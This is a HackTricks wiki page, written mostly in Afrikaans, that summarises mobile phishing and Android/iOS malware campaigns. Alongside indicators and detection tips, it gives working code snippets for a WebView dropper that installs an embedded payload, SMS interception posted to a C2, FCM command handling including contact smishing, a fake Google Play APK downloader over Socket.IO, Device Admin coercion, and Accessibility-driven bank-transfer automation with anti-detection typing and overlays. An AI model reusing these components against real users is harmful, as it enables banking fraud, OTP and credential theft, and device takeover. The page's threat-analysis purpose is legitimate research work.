Mobiele Phishing & Verspreiding van Kwaadaardige Apps (Android & iOS)
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
[!INFO] Hierdie bladsy dek tegnieke wat deur bedreigingsakters gebruik word om malicious Android APKs en iOS mobile-configuration profiles deur phishing (SEO, social engineering, vals winkels, dating-apps, ens.) te versprei. Die materiaal is aangepas van die SarangTrap-kampanje wat deur Zimperium zLabs (2025) blootgestel is en ander publieke navorsing.
Aanvalsverloop
- SEO/Phishing Infrastructure
- Registreer dosyne look-alike domeine (dating, cloud share, car serviceâŠ).
â Gebruik plaaslike taal sleutelwoorde en emojiâs in die
<title>element om in Google te rank. â Host beide Android (.apk) en iOS install instructions op dieselfde landing page.
- First Stage Download
- Android: direkte skakel na ân unsigned of âthird-party storeâ APK.
- iOS:
itms-services://of gewone HTTPS-skakel na ân kwaadaardige mobileconfig profile (see below).
- Sosiale ingenieurswese nĂĄ installasie
- By die eerste keer dat die app hardloop vra dit vir ân invitation / verification code (illusie van eksklusiewe toegang).
- Die kode word POSTed over HTTP na die Command-and-Control (C2).
- C2 antwoord
{"success":true}â malware gaan voort. - Sandbox / AV dinamiese analise wat nooit ân geldige kode stuur nie sien geen malicious behaviour (ontduiking).
- Runtime Permission Abuse (Android)
- Gevaarlike permissies word eers aangevra na positiewe C2-antwoord:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<!-- Older builds also asked for SMS permissions -->
- Onlangse variante verwyder
<uses-permission>vir SMS uitAndroidManifest.xmlmaar laat die Java/Kotlin code path wat SMS deur reflection lees staan â verlaag die statiese telling terwyl dit steeds funksioneel bly op toestelle wat die toestemming viaAppOps-misbruik of ou teikens toewys.
- Voorskynsel UI & agtergrond-insameling
- Die app toon skynbaar onskadelike views (SMS-kijker, gallery-kiezer) wat lokaal geĂŻmplementeer is.
- Intussen eksfiltreer dit:
- IMEI / IMSI, telefoonnommer
- Volledige
ContactsContractdump (JSON array) - JPEG/PNG vanaf
/sdcard/DCIMgekomprimeer met Luban om grootte te verminder - Opsionele SMS-inhoud (
content://sms) Payloads word batch-zipped en gestuur viaHTTP POST /upload.php.
- iOS Delivery Technique
- ân Enkele mobile-configuration profile kan
PayloadType=com.apple.sharedlicenses,com.apple.managedConfigurationens. versoek om die toestel in ân âMDMâ-agtige toesig in te skryf. - Sosiale-ingenieurswese instruksies:
- Maak Settings oop â Profile downloaded.
- Tik drie keer op Install (skermkiekies op die phishing-blad).
- Vertrou die ongetekende profiel â aanvaller kry Contacts & Photo regte sonder App Store hersiening.
- Network Layer
- Plain HTTP, dikwels op poort 80 met HOST header soos
api.<phishingdomain>.com. User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001)(geen TLS â maklik om op te spoor).
Red-Team Wenke
- Dynamic Analysis Bypass â Tydens malware-evaluering outomatiseer die uitnodigingskode-fase met Frida/Objection om die kwaadwillige tak te bereik.
- Manifest vs. Runtime Diff â Vergelyk
aapt dump permissionsmet runtimePackageManager#getRequestedPermissions(); ontbrekende gevaarlike perms is ân rooi vlag. - Network Canary â Stel
iptables -p tcp --dport 80 -j NFQUEUEop om onnatuurlike POST-pieke na kode-invoer te ontdek. - mobileconfig Inspection â Gebruik
security cms -D -i profile.mobileconfigop macOS omPayloadContentte lys en oormatige entitlements op te spoor.
Nuttige Frida-snit: Outomatiese omseiling van uitnodigingskode
Frida: outomatiese omseiling van uitnodigingskode
```javascript // frida -U -f com.badapp.android -l bypass.js --no-pause // Hook HttpURLConnection write to always return success Java.perform(function() { var URL = Java.use('java.net.URL'); URL.openConnection.implementation = function() { var conn = this.openConnection(); var HttpURLConnection = Java.use('java.net.HttpURLConnection'); if (Java.cast(conn, HttpURLConnection)) { conn.getResponseCode.implementation = function(){ return 200; }; conn.getInputStream.implementation = function(){ return Java.use('java.io.ByteArrayInputStream').$new("{\"success\":true}".getBytes()); }; } return conn; }; }); ```Aanwysers (Algemeen)
/req/checkCode.php # invite code validation
/upload.php # batched ZIP exfiltration
LubanCompress 1.1.8 # "Luban" string inside classes.dex
Android WebView Payment Phishing (UPI) â Dropper + FCM C2 Pattern
Hierdie patroon is waargeneem in veldtogte wat government-benefit-temas misbruik om Indiese UPI credentials en OTPs te steel. Operateurs skakel betroubare platforms saam vir aflewering en veerkragtigheid.
Afleweringsketting oor betroubare platforms
- YouTube video lokmiddel â beskrywing bevat ân kort skakel
- Kort skakel â GitHub Pages phishing-webwerf wat die legitieme portaal naboots
- Dieselfde GitHub repo gasheer ân APK met ân valse âGoogle Playâ badge wat direk na die lĂȘer skakel
- Dynamiese phishing-bladsye word gehost op Replit; die afstandbevelkanaal gebruik Firebase Cloud Messaging (FCM)
Dropper met ingebedde payload en offline-installasie
- Eerste APK is ân installer (dropper) wat die werklike malware by
assets/app.apkinsluit en die gebruiker aanmoedig om WiâFi/mobile data uit te skakel om cloud-detectie te versag. - Die ingebedde payload installeer onder ân onskuldige naam (bv. âSecure Updateâ). Na installasie is beide die installer en die payload as afsonderlike apps teenwoordig.
Statiese triage-wenk (grep vir ingebedde payloads):
unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head
Dynamiese endpoint-ontdekking via shortlink
- Malware haal ân plain-text, komma-geskeide lys van aktiewe endpoints vanaf ân shortlink; eenvoudige string-transformasies produseer die finale phishing page path.
Voorbeeld (gesanitiseer):
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" â "gate.htm" (loaded in WebView)
UPI credential POST: https://sqcepo.replit.app/addup.php
SMS upload: https://sqcepo.replit.app/addsm.php
Pseudokode:
String csv = httpGet(shortlink);
String[] parts = csv.split(",");
String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");
WebView-gebaseerde UPI credential harvesting
- Die âMake payment of âč1 / UPIâLiteâ stap laai ân aanvaller se HTML-form vanaf die dinamiese eindpunt binne ân WebView en vang sensitiewe velde (telefoon, bank, UPI PIN) wat
POSTed word naaddup.php.
Minimal loader:
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
Self-propagation and SMS/OTP interception
- Agressiewe toestemmings word by die eerste uitvoering aangevra:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
- Kontakte word deurgeloop om massaal smishing SMS vanaf die slagoffer se toestel te stuur.
- Inkomende SMS word afgevang deur ân broadcast receiver en opgelaai met metadata (sender, body, SIM slot, per-device random ID) na
/addsm.php.
Ontvanger-skets:
public void onReceive(Context c, Intent i){
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
for (SmsMessage m: msgs){
postForm(urlAddSms, new FormBody.Builder()
.add("senderNum", m.getOriginatingAddress())
.add("Message", m.getMessageBody())
.add("Slot", String.valueOf(getSimSlot(i)))
.add("Device rand", getOrMakeDeviceRand(c))
.build());
}
}
Firebase Cloud Messaging (FCM) as weerbare C2
- Die payload registreer by FCM; push-boodskappe dra
_type-veld wat as ân skakelaar gebruik word om aksies te aktiveer (bv. werk phishing-tekssjablone by, skakel gedraginge aan/af).
Voorbeeld FCM payload:
{
"to": "<device_fcm_token>",
"data": {
"_type": "update_texts",
"template": "New subsidy message..."
}
}
Handler-skets:
@Override
public void onMessageReceived(RemoteMessage msg){
String t = msg.getData().get("_type");
switch (t){
case "update_texts": applyTemplate(msg.getData().get("template")); break;
case "smish": sendSmishToContacts(); break;
// ... more remote actions
}
}
Aanwysers/IOCs
- APK bevat sekondĂȘre payload by
assets/app.apk - WebView laai betaling vanaf
gate.htmen exfiltreer na/addup.php - SMS-exfiltrasie na
/addsm.php - Shortlink-gedrewe config-ophaal (bv.,
rebrand.ly/*) wat CSV-endpunte teruggee - Apps gemerk as generiese âUpdate/Secure Updateâ
- FCM
data-boodskappe met ân_type-discriminator in onbetroubare apps
Socket.IO/WebSocket-gebaseerde APK Smuggling + vals Google Play-bladsye
Aanvallers vervang toenemend statiese APK-skakels met ân Socket.IO/WebSocket-kanaal ingebed in lokvalle wat soos Google Play lyk. Dit verberg die payload-URL, omseil URL-/uitbreidingsfilters, en behou ân realistiese installasie-UX.
Tipiese kliëntvloei wat in die wild waargeneem is:
Socket.IO vals Play aflaaier (JavaScript)
```javascript // Open Socket.IO channel and request payload const socket = io("wss://// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(âchunkâ, (chunk) => chunks.push(chunk)); socket.on(âdownloadProgressâ, (p) => updateProgressBar(p));
// Assemble APK clientâside and trigger browser save dialog socket.on(âdownloadCompleteâ, () => { const blob = new Blob(chunks, { type: âapplication/vnd.android.package-archiveâ }); const url = URL.createObjectURL(blob); const a = document.createElement(âaâ); a.href = url; a.download = âapp.apkâ; a.style.display = ânoneâ; document.body.appendChild(a); a.click(); });
</details>
Waarom dit eenvoudige kontroles omseil:
- Geen statiese APK URL word blootgestel; payload word in geheue heropgebou uit WebSocket frames.
- URL/MIME/extension filters wat direkte .apk-antwoorde blokkeer, kan binaire data wat via WebSockets/Socket.IO getunnel word, misloop.
- Crawlers en URL-sandboxes wat WebSockets nie uitvoer nie, sal die payload nie opvraag nie.
Sien ook WebSocket tradecraft and tooling:
<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration â RatOn gevallestudie
Die RatOn banker/RAT campaign (ThreatFabric) is 'n konkrete voorbeeld van hoe moderne mobile phishing operations WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, en selfs NFC-relay orchestration kombineer. Hierdie afdeling abstraheer die herbruikbare tegnieke.
### Stage-1: WebView â native install bridge (dropper)
Aanvallers toon 'n WebView wat na 'n aanvaller-bladsy wys en injecteer 'n JavaScript-koppelvlak wat 'n native installer blootstel. 'n Tik op 'n HTML-knoppie roep native kode aan wat 'n tweede-stadium APK installeer wat in die dropper se assets gebundel is en dit dan direk lanceer.
Minimale patroon:
<details>
<summary>Stage-1 dropper minimale patroon (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}
HTML op die bladsy:
<button onclick="bridge.installApk()">Install</button>
Na installasie begin die dropper die payload via explicit package/activity:
Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);
Opsporingsidee: onbetroubare apps wat addJavascriptInterface() aanroep en installer-agtige metodes aan WebView blootstel; APK wat ân ingeslote sekondĂȘre payload onder assets/ aflewer en die Package Installer Session API aanroep.
Toestemmingsproses: Accessibility + Device Admin + follow-on runtime prompts
Fase-2 open ân WebView wat ân âAccessâ bladsy aanbied. Sy knoppie roep ân ge-exporteerde metode aan wat die slagoffer na die Accessibility-instellings navigeer en versoek om die kwaadwillige diens te aktiveer. Sodra dit toegestaan is, gebruik die malware Accessibility om outomaties deur die volgende runtime-magtigingsdialoĂ« te klik (contacts, overlay, manage system settings, ens.) en versoek Device Admin.
- Accessibility help programmaties om later versoeke te aanvaar deur knoppies soos âAllowâ/âOKâ in die node-tree te vind en klikke te stuur.
- Overlay permission check/request:
if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}
Sien ook:
Overlay-phishing/losprys deur WebView
Operateurs kan opdragte uitreik om:
- ân volskerm-overlay vanaf ân URL te toon, of
- inline HTML deur te gee wat in ân WebView-overlay gelaai word.
Waarskynlike gebruike: dwang (PIN-invoer), wallet-ouvrirng om PINâs vas te vang, losprysboodskappe. Hou ân opdrag om te verseker dat overlay-toestemming toegeken is indien dit ontbreek.
Afstandsbeheer-model â teks pseudo-skerm + skermuitsending
- Lae bandwydte: dump periodiek die Accessibility node-boom, serialiseer sigbare tekste/rolle/begrenzings en stuur na C2 as ân pseudo-skerm (opdragte soos
txt_screeneenmalig enscreen_livedeurlopend). - Hoë getrouheid: versoek MediaProjection en begin skermuitsending/opname op aanvraag (opdragte soos
display/record).
ATS playbook (bank-app-automatisering)
Gegewe ân JSON-taak, open die bank-app, bestuur die UI via Accessibility met ân mengsel van teksnavrae en koördinaat-tappe, en voer die slagoffer se betalings-PIN in wanneer gevra.
Voorbeeldtaak:
{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}
Voorbeeldtekste gesien in een teikenvloei (CZ â EN):
- âNovĂĄ platbaâ â âNuwe betalingâ
- âZadat platbuâ â âVoer betaling inâ
- âNovĂœ pĆĂjemceâ â âNuwe ontvangerâ
- âDomĂĄcĂ ÄĂslo ĂșÄtuâ â âNasionale rekeningnommerâ
- âDalĆĄĂâ â âVolgendeâ
- âOdeslatâ â âStuurâ
- âAno, pokraÄovatâ â âJa, gaan voortâ
- âZaplatitâ â âBetaalâ
- âHotovoâ â âKlaarâ
Operateurs kan ook oordraglimiete nagaan/verhoog via opdragte soos check_limit en limit wat soortgelyk die limiete-UI navigeer.
Crypto wallet seed uittrekking
Teikens soos MetaMask, Trust Wallet, Blockchain.com, Phantom. Vloei: ontsluit (gesteelde PIN of voorsiene wagwoord), navigeer na Security/Recovery, openbaar/vertoon seed phrase, keylog/exfiltrate dit. Implementeer locale-aware selectors (EN/RU/CZ/SK) om die navigasie oor tale te stabiliseer.
Device Admin dwang
Device Admin APIs word gebruik om PIN-vastleggingsgeleenthede te verhoog en die slagoffer te frustreer:
- Onmiddellike sluit:
dpm.lockNow();
- Laat huidige inlogbewys verval om verandering af te dwing (Accessibility vang nuwe PIN/wagwoord):
dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner
- Dwing nie-biometriese ontsluiting af deur keyguard se biometriese funksies uit te skakel:
dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);
Let wel: Baie DevicePolicyManager-beheer vereis Device Owner/Profile Owner op onlangse Android; sommige OEM builds mag losser wees. Valideer altyd op teiken OS/OEM.
NFC relay orchestration (NFSkate)
Stage-3 kan ân eksterne NFC-relay-module installeer en lanseer (bv. NFSkate) en selfs ân HTML-sjabloon daaraan oorhandig om die slagoffer tydens die relay te lei. Dit maak kontaklose card-present cash-out langs aanlyn ATS moontlik.
Achtergrond: NFSkate NFC relay.
Operator opdragstel (voorbeeld)
- UI/toestand:
txt_screen,screen_live,display,record - Sosiaal:
send_push,Facebook,WhatsApp - Oorleggings:
overlay(inline HTML),block(URL),block_off,access_tint - Wallets:
metamask,trust,blockchain,phantom - ATS:
transfer,check_limit,limit - Toestel:
lock,expire_password,disable_keyguard,home,back,recents,power,touch,swipe,keypad,tint,sound_mode,set_sound - Kommunikasie/Recon:
update_device,send_sms,replace_buffer,get_name,add_contact - NFC:
nfs,nfs_inject
Toeganklikheidsgedrewe ATS anti-detectie: mens-agtige teks-kadens en dubbele teksinspuiting (Herodotus)
Dreigspelers meng toenemend Toeganklikheidsgedrewe outomatisering met anti-detectie afgestel teen basiese gedragsbiometrieĂ«. ân Onlangse banker/RAT vertoon twee komplementĂȘre teks-afleweringsmodusse en ân operator-skakelaar om menslike tikgedrag met gerandomiseerde kadens te simuleer.
- Ontdekkingsmodus: enumereer sigbare node met selectors en bounds om insette presies te teiken (ID, text, contentDescription, hint, bounds) voordat opgetree word.
- Dubbele teksinspuiting:
- Modus 1 â
ACTION_SET_TEXTdirek op die teiken-node (stabiel, geen sleutelbord); - Modus 2 â clipboard set +
ACTION_PASTEin die gefokusde node (werk wanneer direkte setText geblokkeer is). - Mens-agtige kadens: verdeel die deur die operator verskafde string en lewer dit karakter-vir-karakter met gerandomiseerde 300â3000 ms vertragings tussen gebeure om âmachine-speed typingâ heuristieke te ontduik. GeĂŻmplementeer Ăłf deur die waarde progressief te vergroot via
ACTION_SET_TEXT, Ăłf deur een karakter op ân slag te plak.
Java-skets: node-ontdekking + vertraagde per-karakter inset via setText of clipboard+paste
```java // Enumerate nodes (HVNCA11Y-like): text, id, desc, hint, bounds void discover(AccessibilityNodeInfo r, List// Mode 1: progressively set text with randomized 300â3000 ms delays void sendTextSetText(AccessibilityNodeInfo field, String s) throws InterruptedException{ String cur = ââ; for (char c: s.toCharArray()){ cur += c; Bundle b=new Bundle(); b.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, cur); field.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, b); Thread.sleep(300 + new java.util.Random().nextInt(2701)); } }
// Mode 2: clipboard + paste per-char with randomized delays void sendTextPaste(AccessibilityService svc, AccessibilityNodeInfo field, String s) throws InterruptedException{ field.performAction(AccessibilityNodeInfo.ACTION_FOCUS); ClipboardManager cm=(ClipboardManager) svc.getSystemService(Context.CLIPBOARD_SERVICE); for (char c: s.toCharArray()){ cm.setPrimaryClip(ClipData.newPlainText(âxâ, Character.toString(c))); field.performAction(AccessibilityNodeInfo.ACTION_PASTE); Thread.sleep(300 + new java.util.Random().nextInt(2701)); } }
</details>
Blokkeeroverlays om bedrog te maskeer:
- Wys 'n volskerm-`TYPE_ACCESSIBILITY_OVERLAY` met operateur-beheerde deursigtigheid; hou dit ondeursigtig vir die slagoffer terwyl afgeleë automatisering daaronder voortgaan.
- Tipies blootgestelde opdragte: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.
Minimale overlay met verstelbare alpha:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);
Operator-beheerprimitiewe wat dikwels gesien word: BACK, HOME, RECENTS, CLICKTXT/CLICKDESC/CLICKELEMENT/CLICKHINT, TAP/SWIPE, NOTIFICATIONS, OPNPKG, VNC/VNCA11Y (skermdeling).
Verwysings
-
New Android Malware Herodotus Mimics Human Behaviour to Evade Detection
-
Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)
-
The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)
-
GhostTap/NFSkate â NFC relay cash-out tactic (ThreatFabric)
-
Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks

